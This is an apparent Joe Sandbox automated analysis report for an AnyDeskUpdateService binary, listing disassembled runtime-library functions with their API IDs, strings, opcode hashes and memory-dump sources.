                                                                                                      • Associated: 00000019.00000002.2253430601.00007FF71DDD3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000019.00000002.2253430601.00007FF71DDDB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000019.00000002.2253514569.00007FF71DDDC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000019.00000002.2253531400.00007FF71DDDD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_25_2_7ff71dd80000_AnyDeskUpdateService.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                      • String ID: invalid string position
                                                                                                      • API String ID: 2081738530-1799206989
                                                                                                      • Opcode ID: fb0e87724d7bafdbaa693a83112c149b3eaf14ca156fab27724b0630734682c2
                                                                                                      • Instruction ID: 73e10c62882552bdd5bc853548dfaa35c1eed28139ebac894333aad22978deb6
                                                                                                      • Opcode Fuzzy Hash: fb0e87724d7bafdbaa693a83112c149b3eaf14ca156fab27724b0630734682c2
                                                                                                      • Instruction Fuzzy Hash: C4817322A0CE4985EE14EF15D490279A761FF84BA4F984233DE9D077A5EF3DE44ACB10
                                                                                                      Function 00007FF71DD885F0 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 45registryCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000019.00000002.2253430601.00007FF71DD81000.00000040.00000001.01000000.00000008.sdmp, Offset: 00007FF71DD80000, based on PE: true
                                                                                                      • Associated: 00000019.00000002.2253409830.00007FF71DD80000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000019.00000002.2253430601.00007FF71DDD3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000019.00000002.2253430601.00007FF71DDDB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000019.00000002.2253514569.00007FF71DDDC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000019.00000002.2253531400.00007FF71DDDD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_25_2_7ff71dd80000_AnyDeskUpdateService.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Event$Source$DeregisterErrorLastRegisterReport
                                                                                                      • String ID: %s failed with %d$AnyDeskUpdateService$AnyDeskUpdateService
                                                                                                      • API String ID: 544316925-1586499718
                                                                                                      • Opcode ID: 3d5dde09e4f0c9a8635dc3b2002a576137b068c398dccda7d93cadec4662d94b
                                                                                                      • Instruction ID: 46200e796e60df4242b38f2109495df45f986ee354865e289defca70c5cc4d3e
                                                                                                      • Opcode Fuzzy Hash: 3d5dde09e4f0c9a8635dc3b2002a576137b068c398dccda7d93cadec4662d94b
                                                                                                      • Instruction Fuzzy Hash: D0112C3161CF8986EB659B54F4513AAB3A0FB887A4F80013AEACD43B54EF7CD1488F50
                                                                                                      Function 00007FF71DDA9A64 Relevance: 11.0, APIs: 3, Strings: 3, Instructions: 494COMMONLIBRARYCODE
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000019.00000002.2253430601.00007FF71DD81000.00000040.00000001.01000000.00000008.sdmp, Offset: 00007FF71DD80000, based on PE: true
                                                                                                      • Associated: 00000019.00000002.2253409830.00007FF71DD80000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000019.00000002.2253430601.00007FF71DDD3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000019.00000002.2253430601.00007FF71DDDB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000019.00000002.2253514569.00007FF71DDDC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000019.00000002.2253531400.00007FF71DDDD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_25_2_7ff71dd80000_AnyDeskUpdateService.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                      • String ID: f$p$p
                                                                                                      • API String ID: 3215553584-1995029353
                                                                                                      • Opcode ID: a2d7795b7d04fa7270e565260d41ff3577274ae9c7a6f098e1df81c8233e13d8
                                                                                                      • Instruction ID: 8600b965a620a0c9bc1de3dde5cacbc288ec77a428bea7bc87d50a321d0f19ac
                                                                                                      • Opcode Fuzzy Hash: a2d7795b7d04fa7270e565260d41ff3577274ae9c7a6f098e1df81c8233e13d8
                                                                                                      • Instruction Fuzzy Hash: 4712C326E0D94B86FB207A55D15427AF691EB40F60FC4C137E6C9467C4EB3CEA888F25
                                                                                                      Function 00007FF71DD82050 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 140COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000019.00000002.2253430601.00007FF71DD81000.00000040.00000001.01000000.00000008.sdmp, Offset: 00007FF71DD80000, based on PE: true
                                                                                                      • Associated: 00000019.00000002.2253409830.00007FF71DD80000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000019.00000002.2253430601.00007FF71DDD3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000019.00000002.2253430601.00007FF71DDDB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000019.00000002.2253514569.00007FF71DDDC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000019.00000002.2253531400.00007FF71DDDD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_25_2_7ff71dd80000_AnyDeskUpdateService.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: std::_$Lockit$GetctypeGetwctypeLocinfo::_Locinfo_ctorLockit::_Lockit::~_
                                                                                                      • String ID: bad locale name
                                                                                                      • API String ID: 1386471777-1405518554
                                                                                                      • Opcode ID: 2fb573258588d9a0732103de3035a81878e4e8febdd76704b08a3a214b084dd1
                                                                                                      • Instruction ID: 005ef8afadd09991c129acc01a159d375c5dc4a2446a470794487e9a259acea6
                                                                                                      • Opcode Fuzzy Hash: 2fb573258588d9a0732103de3035a81878e4e8febdd76704b08a3a214b084dd1
                                                                                                      • Instruction Fuzzy Hash: 53519A22B0DB458AFB15EBB0D4902BC7371AF44758F844136DF8D26A56EF38E55AC720
                                                                                                      Function 00007FF71DD9CD6C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000019.00000002.2253430601.00007FF71DD81000.00000040.00000001.01000000.00000008.sdmp, Offset: 00007FF71DD80000, based on PE: true
                                                                                                      • Associated: 00000019.00000002.2253409830.00007FF71DD80000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000019.00000002.2253430601.00007FF71DDD3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000019.00000002.2253430601.00007FF71DDDB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000019.00000002.2253514569.00007FF71DDDC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000019.00000002.2253531400.00007FF71DDDD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_25_2_7ff71dd80000_AnyDeskUpdateService.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                      • String ID: api-ms-
                                                                                                      • API String ID: 2559590344-2084034818
                                                                                                      • Opcode ID: d6d876a61148c08aaa09cadfa9bfd10722785b3aceef806c8e2bf92c7e5e0abf
                                                                                                      • Instruction ID: 4810d9355caf67f6f5ea063bae7a6edddd992364e836ef572e25be99abc9d68b
                                                                                                      • Opcode Fuzzy Hash: d6d876a61148c08aaa09cadfa9bfd10722785b3aceef806c8e2bf92c7e5e0abf
                                                                                                      • Instruction Fuzzy Hash: 7D310721B1EF5981EE16BB46A800675A395BF04BB1FD90536DD9E07390FF3CE4888B60
                                                                                                      Function 00007FF71DDBC03C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000019.00000002.2253430601.00007FF71DD81000.00000040.00000001.01000000.00000008.sdmp, Offset: 00007FF71DD80000, based on PE: true
                                                                                                      • Associated: 00000019.00000002.2253409830.00007FF71DD80000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000019.00000002.2253430601.00007FF71DDD3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000019.00000002.2253430601.00007FF71DDDB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000019.00000002.2253514569.00007FF71DDDC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000019.00000002.2253531400.00007FF71DDDD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_25_2_7ff71dd80000_AnyDeskUpdateService.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                                      • String ID: CONOUT$
                                                                                                      • API String ID: 3230265001-3130406586
                                                                                                      • Opcode ID: 150489296217e134fac2ce95dd32539a7224101ed53f0799fee9b0db1a451bf2
                                                                                                      • Instruction ID: bbb9f207c51f0396e055922067c3d05c454bd906a5f730fc9d2765eccbf090a2
                                                                                                      • Opcode Fuzzy Hash: 150489296217e134fac2ce95dd32539a7224101ed53f0799fee9b0db1a451bf2
                                                                                                      • Instruction Fuzzy Hash: 3111B421A1CF5582E750AB56E854329A6A0FB89BF4F804235E99D83790EF7CD5188B50
                                                                                                      Function 00007FF71DD92740 Relevance: 9.1, APIs: 6, Instructions: 90COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000019.00000002.2253430601.00007FF71DD81000.00000040.00000001.01000000.00000008.sdmp, Offset: 00007FF71DD80000, based on PE: true
                                                                                                      • Associated: 00000019.00000002.2253409830.00007FF71DD80000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000019.00000002.2253430601.00007FF71DDD3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000019.00000002.2253430601.00007FF71DDDB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000019.00000002.2253514569.00007FF71DDDC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000019.00000002.2253531400.00007FF71DDDD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_25_2_7ff71dd80000_AnyDeskUpdateService.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                      • String ID:
                                                                                                      • API String ID: 2081738530-0
                                                                                                      • Opcode ID: 0117289e98df00da582755afb24c31f3f504ef9a4471fb3c4949e3d48aaf6a78
                                                                                                      • Instruction ID: c91798e06cfaf60c27d4a78e1a217fe7027b0b7277a9f72aa19169638f5bb25a
                                                                                                      • Opcode Fuzzy Hash: 0117289e98df00da582755afb24c31f3f504ef9a4471fb3c4949e3d48aaf6a78
                                                                                                      • Instruction Fuzzy Hash: 4B316325A0CE4985EA19BB55E850179A752FB457B0FD80233DA9D03295FE3DF449CB20
                                                                                                      Function 00007FF71DD93270 Relevance: 9.1, APIs: 6, Instructions: 90COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000019.00000002.2253430601.00007FF71DD81000.00000040.00000001.01000000.00000008.sdmp, Offset: 00007FF71DD80000, based on PE: true
                                                                                                      • Associated: 00000019.00000002.2253409830.00007FF71DD80000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000019.00000002.2253430601.00007FF71DDD3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000019.00000002.2253430601.00007FF71DDDB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000019.00000002.2253514569.00007FF71DDDC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000019.00000002.2253531400.00007FF71DDDD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_25_2_7ff71dd80000_AnyDeskUpdateService.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                      • String ID:
                                                                                                      • API String ID: 2081738530-0
                                                                                                      • Opcode ID: 3c0f3d2b7e2db67fea3719f7c25c5b52825845983d8d7121c0e12f2b9b1ab6b5
                                                                                                      • Instruction ID: 260bedd8915162a9243ea8ac2e4728f45535e27f3c4b14d2f1c88dcab77cfc12
                                                                                                      • Opcode Fuzzy Hash: 3c0f3d2b7e2db67fea3719f7c25c5b52825845983d8d7121c0e12f2b9b1ab6b5
                                                                                                      • Instruction Fuzzy Hash: 54316121A4CE4A85EE19BB55E850179E362FB45BB4FC81133DA9D032A5FE3DF449CB20
                                                                                                      Function 00007FF71DD93690 Relevance: 9.1, APIs: 6, Instructions: 89COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000019.00000002.2253430601.00007FF71DD81000.00000040.00000001.01000000.00000008.sdmp, Offset: 00007FF71DD80000, based on PE: true
                                                                                                      • Associated: 00000019.00000002.2253409830.00007FF71DD80000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000019.00000002.2253430601.00007FF71DDD3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000019.00000002.2253430601.00007FF71DDDB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000019.00000002.2253514569.00007FF71DDDC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000019.00000002.2253531400.00007FF71DDDD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_25_2_7ff71dd80000_AnyDeskUpdateService.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                      • String ID:
                                                                                                      • API String ID: 2081738530-0
                                                                                                      • Opcode ID: 43d25b79fa40fe7f9d6a89727c4015db81dd33ed5e2c0de3b2d10e90f1ab0995
                                                                                                      • Instruction ID: ee6a490c997cdd9f7ad99f7f2963e3efec5ea4310b7e692398dd6f85024ca6c7
                                                                                                      • Opcode Fuzzy Hash: 43d25b79fa40fe7f9d6a89727c4015db81dd33ed5e2c0de3b2d10e90f1ab0995
                                                                                                      • Instruction Fuzzy Hash: 6A318525A0CE4A85EE19BB55E8501B9A352FB44BB0F981233DA9D43295FE3DE40DCB20
                                                                                                      Function 00007FF71DD9A8FC Relevance: 9.1, APIs: 2, Strings: 3, Instructions: 320COMMONLIBRARYCODE
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000019.00000002.2253430601.00007FF71DD81000.00000040.00000001.01000000.00000008.sdmp, Offset: 00007FF71DD80000, based on PE: true
                                                                                                      • Associated: 00000019.00000002.2253409830.00007FF71DD80000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000019.00000002.2253430601.00007FF71DDD3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000019.00000002.2253430601.00007FF71DDDB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000019.00000002.2253514569.00007FF71DDDC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000019.00000002.2253531400.00007FF71DDDD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_25_2_7ff71dd80000_AnyDeskUpdateService.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Is_bad_exception_allowedstd::bad_alloc::bad_alloc
                                                                                                      • String ID: csm$csm$csm
                                                                                                      • API String ID: 3523768491-393685449
                                                                                                      • Opcode ID: 01dbbc9fa7db250a30567b4084371a2519905c46085f65ccfdfdc91a1e3e9cb2
                                                                                                      • Instruction ID: 3636df347e25398023d29ab295a1c3ff244c8e54f17a4b4409c5a9f73a706ef2
                                                                                                      • Opcode Fuzzy Hash: 01dbbc9fa7db250a30567b4084371a2519905c46085f65ccfdfdc91a1e3e9cb2
                                                                                                      • Instruction Fuzzy Hash: DAE1E63390CB8A8AEB14AF35D4803AEB7A1FB44768F501136DACC07655EF39E489CB11
                                                                                                      Function 00007FF71DD945A0 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 240COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000019.00000002.2253430601.00007FF71DD81000.00000040.00000001.01000000.00000008.sdmp, Offset: 00007FF71DD80000, based on PE: true
                                                                                                      • Associated: 00000019.00000002.2253409830.00007FF71DD80000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000019.00000002.2253430601.00007FF71DDD3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000019.00000002.2253430601.00007FF71DDDB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000019.00000002.2253514569.00007FF71DDDC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000019.00000002.2253531400.00007FF71DDDD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_25_2_7ff71dd80000_AnyDeskUpdateService.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Concurrency::cancel_current_task
                                                                                                      • String ID: false$true
                                                                                                      • API String ID: 118556049-2658103896
                                                                                                      • Opcode ID: ad251babf673da30d347f085cc8932aed423ad9c8062fdcdc27bd164a5557edd
                                                                                                      • Instruction ID: 47e2fb45bd94ae1b8debc82dfdc190da64162f2dd01dd510fb81cf59ddb41c65
                                                                                                      • Opcode Fuzzy Hash: ad251babf673da30d347f085cc8932aed423ad9c8062fdcdc27bd164a5557edd
                                                                                                      • Instruction Fuzzy Hash: 4C91E122B1DE4985E714AFA1D4002AD73A6FB487A8F854136DE8C5778AFF39C10AC754
                                                                                                      Function 00007FF71DD81D40 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 115COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000019.00000002.2253430601.00007FF71DD81000.00000040.00000001.01000000.00000008.sdmp, Offset: 00007FF71DD80000, based on PE: true
                                                                                                      • Associated: 00000019.00000002.2253409830.00007FF71DD80000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000019.00000002.2253430601.00007FF71DDD3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000019.00000002.2253430601.00007FF71DDDB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000019.00000002.2253514569.00007FF71DDDC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000019.00000002.2253531400.00007FF71DDDD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_25_2_7ff71dd80000_AnyDeskUpdateService.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: std::_$Lockit$GetctypeLocinfo::_Locinfo_ctorLockit::_Lockit::~_
                                                                                                      • String ID: bad locale name
                                                                                                      • API String ID: 2967684691-1405518554
                                                                                                      • Opcode ID: 591d2bd700e3465a55b0f9c6b706778e586fa78e76f39de4335fe8b1c86bd814
                                                                                                      • Instruction ID: 365a2f191e51f473e754e4704f51c50894ae61d6129dff89be2ed145c4c66c20
                                                                                                      • Opcode Fuzzy Hash: 591d2bd700e3465a55b0f9c6b706778e586fa78e76f39de4335fe8b1c86bd814
                                                                                                      • Instruction Fuzzy Hash: A4418922B0DF4599FB16EBB0D4502BCB371AF40B58F844136DE8D26A5AEF38D51E8724
                                                                                                      Function 00007FF71DDAADC0 Relevance: 7.6, APIs: 5, Instructions: 54COMMONLIBRARYCODE
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • FlsGetValue.KERNEL32(?,?,?,00007FF71DDA471B,?,?,00000000,00007FF71DDA49B6,?,?,?,?,?,00007FF71DDA4942), ref: 00007FF71DDAADDF
                                                                                                      • FlsSetValue.KERNEL32(?,?,?,00007FF71DDA471B,?,?,00000000,00007FF71DDA49B6,?,?,?,?,?,00007FF71DDA4942), ref: 00007FF71DDAADFE
                                                                                                      • FlsSetValue.KERNEL32(?,?,?,00007FF71DDA471B,?,?,00000000,00007FF71DDA49B6,?,?,?,?,?,00007FF71DDA4942), ref: 00007FF71DDAAE26
                                                                                                      • FlsSetValue.KERNEL32(?,?,?,00007FF71DDA471B,?,?,00000000,00007FF71DDA49B6,?,?,?,?,?,00007FF71DDA4942), ref: 00007FF71DDAAE37
                                                                                                      • FlsSetValue.KERNEL32(?,?,?,00007FF71DDA471B,?,?,00000000,00007FF71DDA49B6,?,?,?,?,?,00007FF71DDA4942), ref: 00007FF71DDAAE48
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000019.00000002.2253430601.00007FF71DD81000.00000040.00000001.01000000.00000008.sdmp, Offset: 00007FF71DD80000, based on PE: true
                                                                                                      • Associated: 00000019.00000002.2253409830.00007FF71DD80000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000019.00000002.2253430601.00007FF71DDD3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000019.00000002.2253430601.00007FF71DDDB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000019.00000002.2253514569.00007FF71DDDC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000019.00000002.2253531400.00007FF71DDDD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_25_2_7ff71dd80000_AnyDeskUpdateService.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Value
                                                                                                      • String ID:
                                                                                                      • API String ID: 3702945584-0
                                                                                                      • Opcode ID: d187414ded89b92ad3fb913650dc6829c15d42d8e5d1f32f0a821160ba34cb20
                                                                                                      • Instruction ID: f6abd83909493848663a4843fb0aefe9cf78f5350236a2eeaf3aee41305c8718
                                                                                                      • Opcode Fuzzy Hash: d187414ded89b92ad3fb913650dc6829c15d42d8e5d1f32f0a821160ba34cb20
                                                                                                      • Instruction Fuzzy Hash: 53119020F0CE0E42F9547721955103AE2415F40FB0F88DB36D9BD0A7D6FD2CE94A4B22
                                                                                                      Function 00007FF71DD9B070 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 190COMMONLIBRARYCODE
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000019.00000002.2253430601.00007FF71DD81000.00000040.00000001.01000000.00000008.sdmp, Offset: 00007FF71DD80000, based on PE: true
                                                                                                      • Associated: 00000019.00000002.2253409830.00007FF71DD80000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000019.00000002.2253430601.00007FF71DDD3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000019.00000002.2253430601.00007FF71DDDB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000019.00000002.2253514569.00007FF71DDDC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000019.00000002.2253531400.00007FF71DDDD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_25_2_7ff71dd80000_AnyDeskUpdateService.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CallEncodePointerTranslator
                                                                                                      • String ID: MOC$RCC
                                                                                                      • API String ID: 3544855599-2084237596
                                                                                                      • Opcode ID: 9b1374c6934cf619966cd656eb24c3807a1de378a26e39886319f72bbcd0075f
                                                                                                      • Instruction ID: 4de68b92caead9c1d6810b3e4e7e54467654481485116d7d9f2480692c8589d7
                                                                                                      • Opcode Fuzzy Hash: 9b1374c6934cf619966cd656eb24c3807a1de378a26e39886319f72bbcd0075f
                                                                                                      • Instruction Fuzzy Hash: 5F912673A0CB898AE714DF65E4802ADB7A1F744798F91413AEE8C17B54EF39D099CB00
                                                                                                      Function 00007FF71DD996B0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 154COMMONLIBRARYCODE
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000019.00000002.2253430601.00007FF71DD81000.00000040.00000001.01000000.00000008.sdmp, Offset: 00007FF71DD80000, based on PE: true
                                                                                                      • Associated: 00000019.00000002.2253409830.00007FF71DD80000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000019.00000002.2253430601.00007FF71DDD3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000019.00000002.2253430601.00007FF71DDDB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000019.00000002.2253514569.00007FF71DDDC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000019.00000002.2253531400.00007FF71DDDD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_25_2_7ff71dd80000_AnyDeskUpdateService.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                                      • String ID: csm
                                                                                                      • API String ID: 2395640692-1018135373
                                                                                                      • Opcode ID: efcaeebe434da237d7f8c65ebcc1af5689e54ad5db89f6b9947abdf816ab4442
                                                                                                      • Instruction ID: 1fce6fb06b55ca1d01ee431d40aedb2053f6768f7e4bbf06de5b3f927d8089a4
                                                                                                      • Opcode Fuzzy Hash: efcaeebe434da237d7f8c65ebcc1af5689e54ad5db89f6b9947abdf816ab4442
                                                                                                      • Instruction Fuzzy Hash: 5F51B531B1DA078ADB18EF15D444678B792FB44BA4F905136EA8D43748EF7EE449CB10
                                                                                                      Function 00007FF71DD9AE00 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000019.00000002.2253430601.00007FF71DD81000.00000040.00000001.01000000.00000008.sdmp, Offset: 00007FF71DD80000, based on PE: true
                                                                                                      • Associated: 00000019.00000002.2253409830.00007FF71DD80000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000019.00000002.2253430601.00007FF71DDD3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000019.00000002.2253430601.00007FF71DDDB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000019.00000002.2253514569.00007FF71DDDC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000019.00000002.2253531400.00007FF71DDDD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_25_2_7ff71dd80000_AnyDeskUpdateService.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CallEncodePointerTranslator
                                                                                                      • String ID: MOC$RCC
                                                                                                      • API String ID: 3544855599-2084237596
                                                                                                      • Opcode ID: 9cfd52f45ab5dc4fce2285d457194e45e3416c299f1ca1b90b44c240d660db00
                                                                                                      • Instruction ID: 235d16abb3223273ed8ba495b8f269789aa248782ef77cc9769db75a45930e13
                                                                                                      • Opcode Fuzzy Hash: 9cfd52f45ab5dc4fce2285d457194e45e3416c299f1ca1b90b44c240d660db00
                                                                                                      • Instruction Fuzzy Hash: 0C61723290CB8981DB64AB15E4803AAB7A1FB85794F445236EBDC07B59EF3DD198CB10
